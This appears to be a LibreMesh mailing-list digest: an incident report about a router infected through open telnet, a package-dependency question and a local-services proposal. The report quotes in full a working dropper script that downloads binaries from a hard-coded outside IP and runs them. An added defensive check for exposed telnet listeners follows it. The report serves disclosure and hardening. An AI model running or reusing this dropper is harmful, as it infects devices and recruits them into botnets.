So, I just flashed a generic Community Chaos taken from
http://downloads.libremesh.org/community_chaos/16.07/ar71xx/generic/
on a device that gets a public IPv4 over WAN.
Went in via telnet, configured some bits, but I felt it was a bit
unresponsive. Checking loadavg with "uptime":
12:00:25 up 17 min, load average: 3.70, 1.36, 0.53
and logread showed some OOM... suspicious.
I had been infected already with some malware :(
Found a process "LA4obRtMROA7TAt2wWN1TnwHw"
and a file in the root directory: /bin.sh
which I copy at the end of this email for reference.
So funny, for a moment I felt a deja-vu like the many times I connected
a Windows PC directly to a public IP, and in under 5 minutes it had been
infected with viruses.
(this LiMe was infected in under 15 minutes as well)
It most likely came in via telnet, since that's open and passwordless
by default on our releases.
I think we should at least block telnet port over WAN by default.
##########################
#!/bin/sh
BIN_NAMES="mips mpsl arm arm7 ppc spc m68k sh4"
HTTP_SERVER="95.215.62.11"
HTTP_PORT=80
DROPPER_FILE_NAME="dvrAssist"
for a in $BIN_NAMES
do
if [ -f "/bin/chmod" ]
then
rm $DROPPER_FILE_NAME
/bin/busybox wget http://$HTTP_SERVER:$HTTP_PORT/bins/$a
-O - > $DROPPER_FILE_NAME
chmod 777 $DROPPER_FILE_NAME
./$DROPPER_FILE_NAME
>$DROPPER_FILE_NAME
else
rm $DROPPER_FILE_NAME
cp /bin/echo $DROPPER_FILE_NAME
>$DROPPER_FILE_NAME
/bin/busybox wget http://$HTTP_SERVER:$HTTP_PORT/bins/$a
-O - > $DROPPER_FILE_NAME
./$DROPPER_FILE_NAME
>$DROPPER_FILE_NAME
fi
done
echo infectfgt
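Added example (not part of the original message and not LibreMesh code): a check for the exposure described above, a telnet listener bound to a non-loopback address. It assumes busybox/net-tools `netstat -tln` output; the helper name exposed_listeners and the sample listing are constructed for illustration.

```shell
#!/bin/sh
# Added example: find TCP listeners reachable from other hosts.
# Reads `netstat -tln` output (busybox / net-tools layout) on stdin.

# exposed_listeners PORT...   (hypothetical helper name)
# Prints "port address" for every listener on one of the given ports that
# is bound to a non-loopback address. Exit status: 0 if any found, else 1.
# A wildcard bind (0.0.0.0 or ::) includes the WAN interface unless a
# firewall rule drops the traffic first; this only inspects the socket table.
exposed_listeners() {
    awk -v ports="$*" '
        BEGIN {
            n = split(ports, p, " ")
            for (i = 1; i <= n; i++) want[p[i]] = 1
        }
        $1 ~ /^tcp/ && $NF == "LISTEN" {
            port = $4
            sub(/.*:/, "", port)            # text after the last colon
            addr = substr($4, 1, length($4) - length(port) - 1)
            if (!(port in want)) next
            if (addr ~ /^127\./ || addr == "::1") next   # loopback only
            print port, addr
            found = 1
        }
        END { exit(found ? 0 : 1) }
    '
}

# Constructed sample listing, shaped like a router with telnetd enabled.
sample_netstat() {
    cat <<'EOF'
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN
tcp        0      0 :::22                   :::*                    LISTEN
EOF
}

# On a device: netstat -tln | exposed_listeners 23
if sample_netstat | exposed_listeners 23; then
    echo "telnet is listening on a non-loopback address"
fi
```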
First, I want to say that LibreMesh is awesome! From the short time I've
been looking at it, it looks very professional and well thought out.
I've had two problems getting LIME 16.07 installed:
1. The package 'lime-basic' requires 'lime-eb-ip-tables'
2. 'lime-webui' requires 'luci-i18n-english'
I couldn't find those missing packages anywhere.
The system seems to work when I force opkg to ignore those dependencies,
but I don't know it well enough yet to know if it is fully working.
I compiled from the lime-build source git at:
https://github.com/libremesh/lime-build
I had to use menuconfig to make most everything into a module, since I'm
using a 4MB TPLink MR3020 with an external root on USB. Then I tried to
install 'lime-full'.
I couldn't find the two missing modules by searching in menuconfig.
Apologies if this is already fixed in the dev branch.
-Kevin
Hi All,
My name is Nicolás, I'm from Argentina and I'm working on promoting
community networks while I travel in Latin America... Glad to be part
of this community, and thanks to you all for all you have been doing so
far, it is amazing!!!
I wanted to share with you some of my last work (that I've been
discussing with Nico Echaniz, who suggested to migrate it to here),
about how we can promote the use of local services.
My view about this has been on using local discovery techniques to
identify which local services are around using mdns, and then promote
those services via a captive portal.
There are many services that are already shared in this way (like
printers, media repositories, chat apps) and it is quite easy to add
new ones or index those that are not added manually also.
I have also defined a strategy on how to deploy this on LiMe based on
Nico's experience on multicast packages (those used by the mDNS
discovery mechanism) on mesh networks (quite a mess for now)... so I
found a workaround for this specific case.
We could add a daemon to LiMe that permanently scans its local network
searching for services, and shares that information via Alfred.
Together with another daemon that listens to Alfred and adds that
information to the LiMe mDNS Service (Avahi)... that sorts out the
multicast issue and lets us share that valuable information efficiently.
For those services that don't support mDNS we could add an interface on
luci to manually administer them.
Finally, we could add a section on the Captive Portal to show this
information.
What do you think?
Regards,
--
Nicolás Pace
http://www.linkedin.com/in/nickar